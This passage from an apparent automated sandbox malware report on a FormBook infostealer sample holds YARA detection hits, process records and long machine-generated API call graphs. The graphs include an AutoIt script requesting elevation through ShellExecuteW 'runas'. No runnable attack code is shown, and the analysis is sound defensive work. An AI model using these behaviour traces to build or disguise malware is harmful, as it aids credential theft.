                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3834195003.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3833825431.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3835430269.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:6
                                                                    Start time:03:43:18
                                                                    Start date:05/12/2024
                                                                    Path:C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe"
                                                                    Imagebase:0x300000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:8
                                                                    Start time:03:43:30
                                                                    Start date:05/12/2024
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                    Imagebase:0x7ff6d20e0000
                                                                    File size:676'768 bytes
                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                      Execution Graph

                                                                      Execution Coverage:3.2%
                                                                      Dynamic/Decrypted Code Coverage:1.3%
                                                                      Signature Coverage:7.9%
                                                                      Total number of Nodes:2000
                                                                      Total number of Limit Nodes:136
execution_graph
API calls 105304->105307 105651 fa9d3c 60 API calls Mailbox 105305->105651 105307->105302 105309 fa4ee5 85 API calls 105308->105309 105310 10095ca 105309->105310 105653 1009734 105310->105653 105313 fa4f0b 74 API calls 105314 10095f7 105313->105314 105315 fa4f0b 74 API calls 105314->105315 105316 1009607 105315->105316 105317 fa4f0b 74 API calls 105316->105317 105318 1009622 105317->105318 105319 fa4f0b 74 API calls 105318->105319 105320 100963d 105319->105320 105321 fa4ee5 85 API calls 105320->105321 105322 1009654 105321->105322 105323 fc571c __crtGetStringTypeA_stat 58 API calls 105322->105323 105324 100965b 105323->105324 105325 fc571c __crtGetStringTypeA_stat 58 API calls 105324->105325 105326 1009665 105325->105326 105327 fa4f0b 74 API calls 105326->105327 105328 1009679 105327->105328 105329 1009109 GetSystemTimeAsFileTime 105328->105329 105330 100968c 105329->105330 105331 10096a1 105330->105331 105332 10096b6 105330->105332 105333 fc2d55 _free 58 API calls 105331->105333 105334 100971b 105332->105334 105335 10096bc 105332->105335 105337 10096a7 105333->105337 105336 fc2d55 _free 58 API calls 105334->105336 105659 1008b06 116 API calls __fcloseall 105335->105659 105341 fdd186 105336->105341 105339 fc2d55 _free 58 API calls 105337->105339 105339->105341 105340 1009713 105342 fc2d55 _free 58 API calls 105340->105342 105341->105052 105343 fa4e4a 105341->105343 105342->105341 105344 fa4e54 105343->105344 105346 fa4e5b 105343->105346 105660 fc53a6 105344->105660 105347 fa4e6a 105346->105347 105348 fa4e7b FreeLibrary 105346->105348 105347->105052 105348->105347 105350 fa7e4f 59 API calls 105349->105350 105351 fa79fd 105350->105351 105351->105243 105401 fa4c03 105352->105401 105355 fa4c03 2 API calls 105358 fa4bdc 105355->105358 105356 fa4bec FreeLibrary 105357 fa4bf5 105356->105357 105359 fc525b 105357->105359 105358->105356 105358->105357 105405 fc5270 105359->105405 105361 fa4dfc 105361->105257 105361->105258 105565 fa4c36 105362->105565 105364 fa4b8f 105367 
fa4baa 105364->105367 105368 fa4ba1 FreeLibrary 105364->105368 105366 fa4c36 2 API calls 105366->105364 105369 fa4c70 105367->105369 105368->105367 105370 fc0db6 Mailbox 59 API calls 105369->105370 105371 fa4c85 105370->105371 105372 fa522e 59 API calls 105371->105372 105373 fa4c91 _memmove 105372->105373 105374 fa4ccc 105373->105374 105375 fa4d89 105373->105375 105376 fa4dc1 105373->105376 105377 fa4ec7 69 API calls 105374->105377 105569 fa4e89 CreateStreamOnHGlobal 105375->105569 105580 100991b 95 API calls 105376->105580 105385 fa4cd5 105377->105385 105380 fa4f0b 74 API calls 105380->105385 105381 fa4d69 105381->105265 105383 fdd8a7 105384 fa4ee5 85 API calls 105383->105384 105386 fdd8bb 105384->105386 105385->105380 105385->105381 105385->105383 105575 fa4ee5 105385->105575 105387 fa4f0b 74 API calls 105386->105387 105387->105381 105389 fdd9cd 105388->105389 105390 fa4f1d 105388->105390 105604 fc55e2 105390->105604 105393 1009109 105624 1008f5f 105393->105624 105395 100911f 105395->105273 105397 fa4ed6 105396->105397 105398 fdd990 105396->105398 105629 fc5c60 105397->105629 105400 fa4ede 105400->105275 105402 fa4bd0 105401->105402 105403 fa4c0c LoadLibraryA 105401->105403 105402->105355 105402->105358 105403->105402 105404 fa4c1d GetProcAddress 105403->105404 105404->105402 105408 fc527c __initptd 105405->105408 105406 fc528f 105454 fc8b28 58 API calls __getptd_noexit 105406->105454 105408->105406 105410 fc52c0 105408->105410 105409 fc5294 105455 fc8db6 9 API calls __cftof_l 105409->105455 105424 fd04e8 105410->105424 105413 fc52c5 105414 fc52ce 105413->105414 105415 fc52db 105413->105415 105456 fc8b28 58 API calls __getptd_noexit 105414->105456 105417 fc5305 105415->105417 105418 fc52e5 105415->105418 105439 fd0607 105417->105439 105457 fc8b28 58 API calls __getptd_noexit 105418->105457 105419 fc529f __initptd @_EH4_CallFilterFunc@8 105419->105361 105425 fd04f4 __initptd 105424->105425 105426 fc9c0b __lock 58 API calls 105425->105426 105437 fd0502 
105426->105437 105427 fd057d 105464 fc881d 58 API calls 2 library calls 105427->105464 105428 fd0576 105459 fd05fe 105428->105459 105431 fd0584 105431->105428 105465 fc9e2b InitializeCriticalSectionAndSpinCount 105431->105465 105432 fd05f3 __initptd 105432->105413 105434 fc9c93 __mtinitlocknum 58 API calls 105434->105437 105436 fd05aa EnterCriticalSection 105436->105428 105437->105427 105437->105428 105437->105434 105462 fc6c50 59 API calls __lock 105437->105462 105463 fc6cba LeaveCriticalSection LeaveCriticalSection _doexit 105437->105463 105447 fd0627 __wopenfile 105439->105447 105440 fd0641 105470 fc8b28 58 API calls __getptd_noexit 105440->105470 105442 fd07fc 105442->105440 105446 fd085f 105442->105446 105443 fd0646 105471 fc8db6 9 API calls __cftof_l 105443->105471 105445 fc5310 105458 fc5332 LeaveCriticalSection LeaveCriticalSection __wfsopen 105445->105458 105467 fd85a1 105446->105467 105447->105440 105447->105442 105472 fc37cb 60 API calls 2 library calls 105447->105472 105450 fd07f5 105450->105442 105473 fc37cb 60 API calls 2 library calls 105450->105473 105452 fd0814 105452->105442 105474 fc37cb 60 API calls 2 library calls 105452->105474 105454->105409 105455->105419 105456->105419 105457->105419 105458->105419 105466 fc9d75 LeaveCriticalSection 105459->105466 105461 fd0605 105461->105432 105462->105437 105463->105437 105464->105431 105465->105436 105466->105461 105475 fd7d85 105467->105475 105469 fd85ba 105469->105445 105470->105443 105471->105445 105472->105450 105473->105452 105474->105442 105476 fd7d91 __initptd 105475->105476 105477 fd7da7 105476->105477 105479 fd7ddd 105476->105479 105562 fc8b28 58 API calls __getptd_noexit 105477->105562 105486 fd7e4e 105479->105486 105480 fd7dac 105563 fc8db6 9 API calls __cftof_l 105480->105563 105483 fd7df9 105564 fd7e22 LeaveCriticalSection __unlock_fhandle 105483->105564 105485 fd7db6 __initptd 105485->105469 105487 fd7e6e 105486->105487 105488 fc44ea __wsopen_nolock 58 API calls 105487->105488 105491 fd7e8a 
105488->105491 105489 fd7fc1 105490 fc8dc6 __invoke_watson 8 API calls 105489->105490 105492 fd85a0 105490->105492 105491->105489 105493 fd7ec4 105491->105493 105504 fd7ee7 105491->105504 105494 fd7d85 __wsopen_helper 103 API calls 105492->105494 105495 fc8af4 __chsize_nolock 58 API calls 105493->105495 105496 fd85ba 105494->105496 105497 fd7ec9 105495->105497 105496->105483 105498 fc8b28 __cftof_l 58 API calls 105497->105498 105499 fd7ed6 105498->105499 105501 fc8db6 __cftof_l 9 API calls 105499->105501 105500 fd7fa5 105502 fc8af4 __chsize_nolock 58 API calls 105500->105502 105503 fd7ee0 105501->105503 105505 fd7faa 105502->105505 105503->105483 105504->105500 105508 fd7f83 105504->105508 105506 fc8b28 __cftof_l 58 API calls 105505->105506 105507 fd7fb7 105506->105507 105509 fc8db6 __cftof_l 9 API calls 105507->105509 105510 fcd294 __alloc_osfhnd 61 API calls 105508->105510 105509->105489 105511 fd8051 105510->105511 105512 fd807e 105511->105512 105513 fd805b 105511->105513 105515 fd7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105512->105515 105514 fc8af4 __chsize_nolock 58 API calls 105513->105514 105516 fd8060 105514->105516 105523 fd80a0 105515->105523 105517 fc8b28 __cftof_l 58 API calls 105516->105517 105519 fd806a 105517->105519 105518 fd811e GetFileType 105520 fd8129 GetLastError 105518->105520 105521 fd816b 105518->105521 105525 fc8b28 __cftof_l 58 API calls 105519->105525 105526 fc8b07 __dosmaperr 58 API calls 105520->105526 105531 fcd52a __set_osfhnd 59 API calls 105521->105531 105522 fd80ec GetLastError 105524 fc8b07 __dosmaperr 58 API calls 105522->105524 105523->105518 105523->105522 105527 fd7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105523->105527 105528 fd8111 105524->105528 105525->105503 105529 fd8150 CloseHandle 105526->105529 105530 fd80e1 105527->105530 105533 fc8b28 __cftof_l 58 API calls 105528->105533 105529->105528 105532 fd815e 105529->105532 105530->105518 105530->105522 105536 fd8189 105531->105536 
105534 fc8b28 __cftof_l 58 API calls 105532->105534 105533->105489 105535 fd8163 105534->105535 105535->105528 105537 fd820a 105536->105537 105538 fd8344 105536->105538 105539 fd18c1 __lseeki64_nolock 60 API calls 105536->105539 105537->105538 105553 fd18c1 60 API calls __lseeki64_nolock 105537->105553 105554 fcd886 __write 78 API calls 105537->105554 105559 fd8212 105537->105559 105538->105489 105540 fd8517 CloseHandle 105538->105540 105541 fd81f3 105539->105541 105542 fd7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105540->105542 105544 fc8af4 __chsize_nolock 58 API calls 105541->105544 105541->105559 105543 fd853e 105542->105543 105545 fd83ce 105543->105545 105546 fd8546 GetLastError 105543->105546 105544->105537 105545->105489 105547 fc8b07 __dosmaperr 58 API calls 105546->105547 105550 fd8552 105547->105550 105548 fd0e5b 70 API calls __read_nolock 105548->105559 105549 fd0add __close_nolock 61 API calls 105549->105559 105552 fcd43d __free_osfhnd 59 API calls 105550->105552 105551 fd97a2 __chsize_nolock 82 API calls 105551->105559 105552->105545 105553->105537 105554->105537 105555 fd83c1 105557 fd0add __close_nolock 61 API calls 105555->105557 105556 fd83aa 105556->105538 105558 fd83c8 105557->105558 105561 fc8b28 __cftof_l 58 API calls 105558->105561 105559->105537 105559->105548 105559->105549 105559->105551 105559->105555 105559->105556 105560 fd18c1 60 API calls __lseeki64_nolock 105559->105560 105560->105559 105561->105545 105562->105480 105563->105485 105564->105485 105566 fa4b83 105565->105566 105567 fa4c3f LoadLibraryA 105565->105567 105566->105364 105566->105366 105567->105566 105568 fa4c50 GetProcAddress 105567->105568 105568->105566 105570 fa4ea3 FindResourceExW 105569->105570 105574 fa4ec0 105569->105574 105571 fdd933 LoadResource 105570->105571 105570->105574 105572 fdd948 SizeofResource 105571->105572 105571->105574 105573 fdd95c LockResource 105572->105573 105572->105574 105573->105574 105574->105374 105576 fdd9ab 105575->105576 
105577 fa4ef4 105575->105577 105581 fc584d 105577->105581 105579 fa4f02 105579->105385 105580->105374 105582 fc5859 __initptd 105581->105582 105583 fc586b 105582->105583 105585 fc5891 105582->105585 105594 fc8b28 58 API calls __getptd_noexit 105583->105594 105596 fc6c11 105585->105596 105586 fc5870 105595 fc8db6 9 API calls __cftof_l 105586->105595 105589 fc5897 105602 fc57be 83 API calls 4 library calls 105589->105602 105591 fc58a6 105603 fc58c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 105591->105603 105593 fc587b __initptd 105593->105579 105594->105586 105595->105593 105597 fc6c21 105596->105597 105598 fc6c43 EnterCriticalSection 105596->105598 105597->105598 105599 fc6c29 105597->105599 105600 fc6c39 105598->105600 105601 fc9c0b __lock 58 API calls 105599->105601 105600->105589 105601->105600 105602->105591 105603->105593 105607 fc55fd 105604->105607 105606 fa4f2e 105606->105393 105608 fc5609 __initptd 105607->105608 105609 fc564c 105608->105609 105610 fc561f _memset 105608->105610 105611 fc5644 __initptd 105608->105611 105612 fc6c11 __lock_file 59 API calls 105609->105612 105620 fc8b28 58 API calls __getptd_noexit 105610->105620 105611->105606 105613 fc5652 105612->105613 105622 fc541d 72 API calls 6 library calls 105613->105622 105616 fc5639 105621 fc8db6 9 API calls __cftof_l 105616->105621 105617 fc5668 105623 fc5686 LeaveCriticalSection LeaveCriticalSection __wfsopen 105617->105623 105620->105616 105621->105611 105622->105617 105623->105611 105627 fc520a GetSystemTimeAsFileTime 105624->105627 105626 1008f6e 105626->105395 105628 fc5238 __aulldiv 105627->105628 105628->105626 105630 fc5c6c __initptd 105629->105630 105631 fc5c7e 105630->105631 105632 fc5c93 105630->105632 105643 fc8b28 58 API calls __getptd_noexit 105631->105643 105633 fc6c11 __lock_file 59 API calls 105632->105633 105636 fc5c99 105633->105636 105635 fc5c83 105644 fc8db6 9 API calls __cftof_l 105635->105644 105645 fc58d0 67 API calls 5 library calls 105636->105645 105639 fc5ca4 
105646 fc5cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 105639->105646 105641 fc5cb6 105642 fc5c8e __initptd 105641->105642 105642->105400 105643->105635 105644->105642 105645->105639 105646->105641 105647->105281 105648->105295 105649->105298 105650->105294 105651->105302 105652->105303 105656 1009748 __tzset_nolock _wcscmp 105653->105656 105654 1009109 GetSystemTimeAsFileTime 105654->105656 105655 10095dc 105655->105313 105655->105341 105656->105654 105656->105655 105657 fa4f0b 74 API calls 105656->105657 105658 fa4ee5 85 API calls 105656->105658 105657->105656 105658->105656 105659->105340 105661 fc53b2 __initptd 105660->105661 105662 fc53de 105661->105662 105663 fc53c6 105661->105663 105665 fc6c11 __lock_file 59 API calls 105662->105665 105669 fc53d6 __initptd 105662->105669 105689 fc8b28 58 API calls __getptd_noexit 105663->105689 105667 fc53f0 105665->105667 105666 fc53cb 105690 fc8db6 9 API calls __cftof_l 105666->105690 105673 fc533a 105667->105673 105669->105346 105674 fc535d 105673->105674 105675 fc5349 105673->105675 105676 fc5359 105674->105676 105692 fc4a3d 105674->105692 105735 fc8b28 58 API calls __getptd_noexit 105675->105735 105691 fc5415 LeaveCriticalSection LeaveCriticalSection __wfsopen 105676->105691 105679 fc534e 105736 fc8db6 9 API calls __cftof_l 105679->105736 105685 fc5377 105709 fd0a02 105685->105709 105687 fc537d 105687->105676 105688 fc2d55 _free 58 API calls 105687->105688 105688->105676 105689->105666 105690->105669 105691->105669 105693 fc4a50 105692->105693 105697 fc4a74 105692->105697 105694 fc46e6 __ftell_nolock 58 API calls 105693->105694 105693->105697 105695 fc4a6d 105694->105695 105737 fcd886 105695->105737 105698 fd0b77 105697->105698 105699 fc5371 105698->105699 105700 fd0b84 105698->105700 105702 fc46e6 105699->105702 105700->105699 105701 fc2d55 _free 58 API calls 105700->105701 105701->105699 105703 fc4705 105702->105703 105704 fc46f0 105702->105704 105703->105685 105872 fc8b28 58 API calls __getptd_noexit 
105704->105872 105706 fc46f5 105873 fc8db6 9 API calls __cftof_l 105706->105873 105708 fc4700 105708->105685 105710 fd0a0e __initptd 105709->105710 105711 fd0a1b 105710->105711 105712 fd0a32 105710->105712 105889 fc8af4 58 API calls __getptd_noexit 105711->105889 105713 fd0abd 105712->105713 105715 fd0a42 105712->105715 105894 fc8af4 58 API calls __getptd_noexit 105713->105894 105718 fd0a6a 105715->105718 105719 fd0a60 105715->105719 105717 fd0a20 105890 fc8b28 58 API calls __getptd_noexit 105717->105890 105723 fcd206 ___lock_fhandle 59 API calls 105718->105723 105891 fc8af4 58 API calls __getptd_noexit 105719->105891 105722 fd0a65 105895 fc8b28 58 API calls __getptd_noexit 105722->105895 105725 fd0a70 105723->105725 105727 fd0a8e 105725->105727 105728 fd0a83 105725->105728 105726 fd0ac9 105896 fc8db6 9 API calls __cftof_l 105726->105896 105892 fc8b28 58 API calls __getptd_noexit 105727->105892 105874 fd0add 105728->105874 105731 fd0a27 __initptd 105731->105687 105733 fd0a89 105893 fd0ab5 LeaveCriticalSection __unlock_fhandle 105733->105893 105735->105679 105736->105676 105738 fcd892 __initptd 105737->105738 105739 fcd89f 105738->105739 105740 fcd8b6 105738->105740 105838 fc8af4 58 API calls __getptd_noexit 105739->105838 105742 fcd955 105740->105742 105744 fcd8ca 105740->105744 105844 fc8af4 58 API calls __getptd_noexit 105742->105844 105743 fcd8a4 105839 fc8b28 58 API calls __getptd_noexit 105743->105839 105747 fcd8e8 105744->105747 105748 fcd8f2 105744->105748 105840 fc8af4 58 API calls __getptd_noexit 105747->105840 105765 fcd206 105748->105765 105751 fcd8ed 105845 fc8b28 58 API calls __getptd_noexit 105751->105845 105752 fcd8f8 105755 fcd91e 105752->105755 105756 fcd90b 105752->105756 105754 fcd8ab __initptd 105754->105697 105841 fc8b28 58 API calls __getptd_noexit 105755->105841 105774 fcd975 105756->105774 105757 fcd961 105846 fc8db6 9 API calls __cftof_l 105757->105846 105761 fcd917 105843 fcd94d LeaveCriticalSection __unlock_fhandle 105761->105843 105762 
fcd923 105842 fc8af4 58 API calls __getptd_noexit 105762->105842 105766 fcd212 __initptd 105765->105766 105767 fcd261 EnterCriticalSection 105766->105767 105768 fc9c0b __lock 58 API calls 105766->105768 105769 fcd287 __initptd 105767->105769 105770 fcd237 105768->105770 105769->105752 105771 fcd24f 105770->105771 105847 fc9e2b InitializeCriticalSectionAndSpinCount 105770->105847 105848 fcd28b LeaveCriticalSection _doexit 105771->105848 105775 fcd982 __ftell_nolock 105774->105775 105776 fcd9e0 105775->105776 105777 fcd9c1 105775->105777 105824 fcd9b6 105775->105824 105782 fcda38 105776->105782 105783 fcda1c 105776->105783 105858 fc8af4 58 API calls __getptd_noexit 105777->105858 105778 fcc5f6 ___crtMessageBoxW 6 API calls 105780 fce1d6 105778->105780 105780->105761 105781 fcd9c6 105859 fc8b28 58 API calls __getptd_noexit 105781->105859 105786 fcda51 105782->105786 105864 fd18c1 60 API calls 3 library calls 105782->105864 105861 fc8af4 58 API calls __getptd_noexit 105783->105861 105849 fd5c6b 105786->105849 105787 fcda21 105862 fc8b28 58 API calls __getptd_noexit 105787->105862 105788 fcd9cd 105860 fc8db6 9 API calls __cftof_l 105788->105860 105793 fcda5f 105795 fcddb8 105793->105795 105865 fc99ac 58 API calls 2 library calls 105793->105865 105794 fcda28 105863 fc8db6 9 API calls __cftof_l 105794->105863 105796 fce14b WriteFile 105795->105796 105797 fcddd6 105795->105797 105800 fcddab GetLastError 105796->105800 105804 fcdd78 105796->105804 105801 fcddec 105797->105801 105802 fcdefa 105797->105802 105800->105804 105807 fcde5b WriteFile 105801->105807 105812 fce184 105801->105812 105821 fcdfef 105802->105821 105822 fcdf05 105802->105822 105803 fcda8b GetConsoleMode 105803->105795 105806 fcdaca 105803->105806 105811 fcded8 105804->105811 105804->105812 105804->105824 105805 fcdada GetConsoleCP 105805->105812 105833 fcdb09 105805->105833 105806->105795 105806->105805 105807->105800 105809 fcde98 105807->105809 105809->105801 105816 fcdebc 105809->105816 105810 fce1b2 
105871 fc8af4 58 API calls __getptd_noexit 105810->105871 105813 fce17b 105811->105813 105814 fcdee3 105811->105814 105812->105824 105870 fc8b28 58 API calls __getptd_noexit 105812->105870 105869 fc8b07 58 API calls 3 library calls 105813->105869 105867 fc8b28 58 API calls __getptd_noexit 105814->105867 105815 fce064 WideCharToMultiByte 105815->105800 105831 fce0ab 105815->105831 105816->105804 105817 fcdf6a WriteFile 105817->105800 105823 fcdfb9 105817->105823 105821->105812 105821->105815 105822->105812 105822->105817 105823->105804 105823->105816 105823->105822 105824->105778 105825 fcdee8 105868 fc8af4 58 API calls __getptd_noexit 105825->105868 105826 fce0b3 WriteFile 105829 fce106 GetLastError 105826->105829 105826->105831 105829->105831 105830 fd62ba 60 API calls __write_nolock 105830->105833 105831->105804 105831->105816 105831->105821 105831->105826 105832 fd7a5e WriteConsoleW CreateFileW __putwch_nolock 105836 fcdc5f 105832->105836 105833->105804 105833->105830 105834 fcdbf2 WideCharToMultiByte 105833->105834 105833->105836 105866 fc35f5 58 API calls __isleadbyte_l 105833->105866 105834->105804 105835 fcdc2d WriteFile 105834->105835 105835->105800 105835->105836 105836->105800 105836->105804 105836->105832 105836->105833 105837 fcdc87 WriteFile 105836->105837 105837->105800 105837->105836 105838->105743 105839->105754 105840->105751 105841->105762 105842->105761 105843->105754 105844->105751 105845->105757 105846->105754 105847->105771 105848->105767 105850 fd5c76 105849->105850 105851 fd5c83 105849->105851 105852 fc8b28 __cftof_l 58 API calls 105850->105852 105854 fd5c8f 105851->105854 105855 fc8b28 __cftof_l 58 API calls 105851->105855 105853 fd5c7b 105852->105853 105853->105793 105854->105793 105856 fd5cb0 105855->105856 105857 fc8db6 __cftof_l 9 API calls 105856->105857 105857->105853 105858->105781 105859->105788 105860->105824 105861->105787 105862->105794 105863->105824 105864->105786 105865->105803 105866->105833 105867->105825 105868->105824 
105869->105824 105870->105810 105871->105824 105872->105706 105873->105708 105897 fcd4c3 105874->105897 105876 fd0b41 105910 fcd43d 59 API calls 2 library calls 105876->105910 105878 fd0aeb 105878->105876 105879 fd0b1f 105878->105879 105881 fcd4c3 __chsize_nolock 58 API calls 105878->105881 105879->105876 105882 fcd4c3 __chsize_nolock 58 API calls 105879->105882 105880 fd0b49 105883 fd0b6b 105880->105883 105911 fc8b07 58 API calls 3 library calls 105880->105911 105884 fd0b16 105881->105884 105885 fd0b2b CloseHandle 105882->105885 105883->105733 105888 fcd4c3 __chsize_nolock 58 API calls 105884->105888 105885->105876 105886 fd0b37 GetLastError 105885->105886 105886->105876 105888->105879 105889->105717 105890->105731 105891->105722 105892->105733 105893->105731 105894->105722 105895->105726 105896->105731 105898 fcd4ce 105897->105898 105900 fcd4e3 105897->105900 105912 fc8af4 58 API calls __getptd_noexit 105898->105912 105904 fcd508 105900->105904 105914 fc8af4 58 API calls __getptd_noexit 105900->105914 105901 fcd4d3 105913 fc8b28 58 API calls __getptd_noexit 105901->105913 105904->105878 105905 fcd512 105915 fc8b28 58 API calls __getptd_noexit 105905->105915 105906 fcd4db 105906->105878 105908 fcd51a 105916 fc8db6 9 API calls __cftof_l 105908->105916 105910->105880 105911->105883 105912->105901 105913->105906 105914->105905 105915->105908 105916->105906 105918 fc079e __ftell_nolock 105917->105918 105919 fc079f GetLongPathNameW 105918->105919 105920 fa7bcc 59 API calls 105919->105920 105921 fa72bd 105920->105921 105922 fa700b 105921->105922 105923 fa7667 59 API calls 105922->105923 105924 fa701d 105923->105924 105925 fa4750 60 API calls 105924->105925 105926 fa7028 105925->105926 105927 fde885 105926->105927 105928 fa7033 105926->105928 105932 fde89f 105927->105932 105975 fa7908 61 API calls 105927->105975 105929 fa3f74 59 API calls 105928->105929 105931 fa703f 105929->105931 105969 fa34c2 105931->105969 105934 fa7052 Mailbox 105934->105131 105936 fa4ddd 136 API 
calls 105935->105936 105937 fa688f 105936->105937 105938 fde031 105937->105938 105940 fa4ddd 136 API calls 105937->105940 105939 100955b 122 API calls 105938->105939 105941 fde046 105939->105941 105942 fa68a3 105940->105942 105944 fde04a 105941->105944 105945 fde067 105941->105945 105942->105938 105943 fa68ab 105942->105943 105946 fa68b7 105943->105946 105947 fde052 105943->105947 105948 fa4e4a 84 API calls 105944->105948 105949 fc0db6 Mailbox 59 API calls 105945->105949 105976 fa6a8c 105946->105976 106068 10042f8 90 API calls _wprintf 105947->106068 105948->105947 105958 fde0ac Mailbox 105949->105958 105953 fde060 105953->105945 105954 fde260 105955 fc2d55 _free 58 API calls 105954->105955 105956 fde268 105955->105956 105957 fa4e4a 84 API calls 105956->105957 105959 fde271 105957->105959 105958->105954 105958->105959 105966 fa7de1 59 API calls 105958->105966 106069 fff73d 59 API calls 2 library calls 105958->106069 106070 fff65e 61 API calls 2 library calls 105958->106070 106071 100737f 59 API calls Mailbox 105958->106071 106072 fa750f 59 API calls 2 library calls 105958->106072 106073 fa735d 59 API calls Mailbox 105958->106073 105963 fc2d55 _free 58 API calls 105959->105963 105964 fa4e4a 84 API calls 105959->105964 106074 fff7a1 89 API calls 4 library calls 105959->106074 105963->105959 105964->105959 105966->105958 105970 fa34d4 105969->105970 105974 fa34f3 _memmove 105969->105974 105972 fc0db6 Mailbox 59 API calls 105970->105972 105971 fc0db6 Mailbox 59 API calls 105973 fa350a 105971->105973 105972->105974 105973->105934 105974->105971 105975->105927 105977 fde41e 105976->105977 105978 fa6ab5 105976->105978 106147 fff7a1 89 API calls 4 library calls 105977->106147 106080 fa57a6 60 API calls Mailbox 105978->106080 105981 fa6ad7 106081 fa57f6 67 API calls 105981->106081 105982 fde431 106148 fff7a1 89 API calls 4 library calls 105982->106148 105984 fa6aec 105984->105982 105986 fa6af4 105984->105986 105988 fa7667 59 API calls 105986->105988 105987 fde44d 105990 
fa6b61 105987->105990 105989 fa6b00 105988->105989 106082 fc0957 60 API calls __ftell_nolock 105989->106082 105992 fa6b6f 105990->105992 105993 fde460 105990->105993 105996 fa7667 59 API calls 105992->105996 105995 fa5c6f CloseHandle 105993->105995 105994 fa6b0c 105997 fa7667 59 API calls 105994->105997 105999 fde46c 105995->105999 106000 fa6b78 105996->106000 105998 fa6b18 105997->105998 106001 fa4750 60 API calls 105998->106001 106002 fa4ddd 136 API calls 105999->106002 106003 fa7667 59 API calls 106000->106003 106004 fa6b26 106001->106004 106005 fde488 106002->106005 106006 fa6b81 106003->106006 106083 fa5850 ReadFile SetFilePointerEx 106004->106083 106008 fde4b1 106005->106008 106011 100955b 122 API calls 106005->106011 106085 fa459b 106006->106085 106149 fff7a1 89 API calls 4 library calls 106008->106149 106010 fa6b52 106084 fa5aee SetFilePointerEx SetFilePointerEx 106010->106084 106015 fde4a4 106011->106015 106012 fa6b98 106016 fa7b2e 59 API calls 106012->106016 106017 fde4cd 106015->106017 106018 fde4ac 106015->106018 106019 fa6ba9 SetCurrentDirectoryW 106016->106019 106020 fa4e4a 84 API calls 106017->106020 106021 fa4e4a 84 API calls 106018->106021 106022 fa6bbc Mailbox 106019->106022 106023 fde4d2 106020->106023 106021->106008 106026 fc0db6 Mailbox 59 API calls 106022->106026 106024 fc0db6 Mailbox 59 API calls 106023->106024 106030 fde506 106024->106030 106028 fa6bcf 106026->106028 106027 fa3bbb 106027->104990 106027->104999 106029 fa522e 59 API calls 106028->106029 106057 fa6bda Mailbox __NMSG_WRITE 106029->106057 106150 fa750f 59 API calls 2 library calls 106030->106150 106032 fa6ce7 106143 fa5c6f 106032->106143 106035 fde740 106156 10072df 59 API calls Mailbox 106035->106156 106036 fa6cf3 SetCurrentDirectoryW 106049 fa6d0c Mailbox 106036->106049 106039 fde762 106157 101fbce 59 API calls 2 library calls 106039->106157 106042 fde76f 106044 fc2d55 _free 58 API calls 106042->106044 106043 fde7d9 106160 fff7a1 89 API calls 4 library calls 106043->106160 

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FA3B68
• IsDebuggerPresent.KERNEL32 ref: 00FA3B7A
• GetFullPathNameW.KERNEL32(00007FFF,?,?,010652F8,010652E0,?,?), ref: 00FA3BEB
  • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
  • Part of subcall function 00FB092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00FA3C14,010652F8,?,?,?), ref: 00FB096E
• SetCurrentDirectoryW.KERNEL32(?), ref: 00FA3C6F
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,01057770,00000010), ref: 00FDD281
• SetCurrentDirectoryW.KERNEL32(?,010652F8,?,?,?), ref: 00FDD2B9
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01054260,010652F8,?,?,?), ref: 00FDD33F
• ShellExecuteW.SHELL32(00000000,?,?), ref: 00FDD346
  • Part of subcall function 00FA3A46: GetSysColorBrush.USER32(0000000F), ref: 00FA3A50
  • Part of subcall function 00FA3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00FA3A5F
  • Part of subcall function 00FA3A46: LoadIconW.USER32(00000063), ref: 00FA3A76
  • Part of subcall function 00FA3A46: LoadIconW.USER32(000000A4), ref: 00FA3A88
  • Part of subcall function 00FA3A46: LoadIconW.USER32(000000A2), ref: 00FA3A9A
  • Part of subcall function 00FA3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FA3AC0
  • Part of subcall function 00FA3A46: RegisterClassExW.USER32(?), ref: 00FA3B16
  • Part of subcall function 00FA39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FA3A03
